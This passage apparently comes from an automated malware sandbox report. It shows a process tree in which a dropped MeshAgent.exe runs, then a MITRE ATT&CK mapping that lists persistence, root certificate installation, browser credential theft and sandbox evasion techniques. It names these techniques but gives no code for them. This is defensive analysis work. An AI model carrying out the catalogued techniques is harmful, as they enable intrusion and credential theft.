C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5128 -ip 5128
1⤵
PID:5648

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
PID:4184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indirect Command Execution

T1202

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion